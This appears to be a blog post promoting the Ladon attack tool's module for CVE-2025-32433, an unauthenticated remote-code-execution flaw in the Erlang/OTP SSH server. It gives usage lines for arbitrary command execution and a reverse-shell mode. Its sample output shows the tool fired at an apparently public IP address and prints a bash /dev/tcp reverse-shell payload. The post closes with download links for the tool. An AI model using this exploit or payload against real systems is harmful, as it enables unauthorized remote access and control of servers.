Description

A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.

Affected Versions

OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier

Features

• Exploit Execution: Execute arbitrary commands.
• Reverse Shell: Initiate a bash-based reverse shell.

Usage

Usage:
Ladon CVE-2025-32433 <target_ip> <target_port> [mode] [options]

Modes:

1. Command Execution Mode:
   Ladon CVE-2025-32433 <target_ip> <target_port> cmd “”

   Example:

   1	Ladon CVE-2025-32433 192.168.18.9 2222 cmd "id>888.txt"

2. Reverse Shell Mode:
   Ladon CVE-2025-32433 <target_ip> <target_port> shell <local_ip> <local_port>

   Example:

   1	Ladon CVE-2025-32433 192.168.18.9 2222 shell 192.168.18.203 4444

Result

1
2
3
4
5
6
7
8
9

C:\Users\Administrator\Desktop\Ladon12>Ladon CVE-2025-32433 185.164.148.243 7777 shell 192.168.1.1 4444

Load CVE-2025-32433
[*] Sending reverse shell to connect back to 192.168.1.1:4444
[*] Connecting to target...
[+] Received banner: SSH-2.0-Erlang/4.7.6.3
[+] Running command: os:cmd("bash -c 'exec 5<>/dev/tcp/192.168.1.1/4444; cat <&5 | while read line; do $line 2>&5 >&5; done'").
[√] Exploit sent. If vulnerable, command should execute.
[+] Reverse shell command sent. Check your listener.

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

历史版本: https://github.com/k8gege/Ladon/releases
911版本：http://k8gege.org/Download

References

GitHub Advisory

NVD CVE-2025-32433

Platform Security

转载声明

K8博客文章随意转载，转载请注明出处！ © K8gege http://k8gege.org